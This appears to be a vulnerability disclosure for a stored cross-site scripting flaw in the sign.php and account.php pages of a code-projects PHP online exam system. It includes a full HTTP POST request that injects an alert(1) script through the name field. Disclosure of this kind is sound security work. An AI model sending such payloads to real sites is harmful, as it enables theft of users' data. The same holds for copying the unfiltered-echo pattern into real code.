code-projects online-exam-mastering-system-php has Cross Site Scripting vulnerability in sign.php and account.php

supplier

https://code-projects.org/online-exam-mastering-system-php/

describe

In sign.php and account.php .There are unrestricted cross site scripting attacks and injection attacks in the online-exam-mastering-system-php. The controllable parameters are as follows: nome parameter. This function will execute the user parameter without restriction into the echo statement. Malicious attackers can exploit this vulnerability to obtain sensitive information from clients

Code analysis

Querying and storing data from the database directly and echo out it without filter, resulting in the execution of XSS statements.

payload

POST /sign.php?q=account.php HTTP/1.1

Host: 192.168.0.143

Content-Length: 129

Cache-Control: max-age=0

Accept-Language: en-US

Upgrade-Insecure-Requests: 1

Origin: http://192.168.0.143

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://192.168.0.143/

Accept-Encoding: gzip, deflate, br

Connection: keep-alive



name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&gender=M&college=aaa&email=aaa%40aaa.com&mob=123456&password=123456&cpassword=123456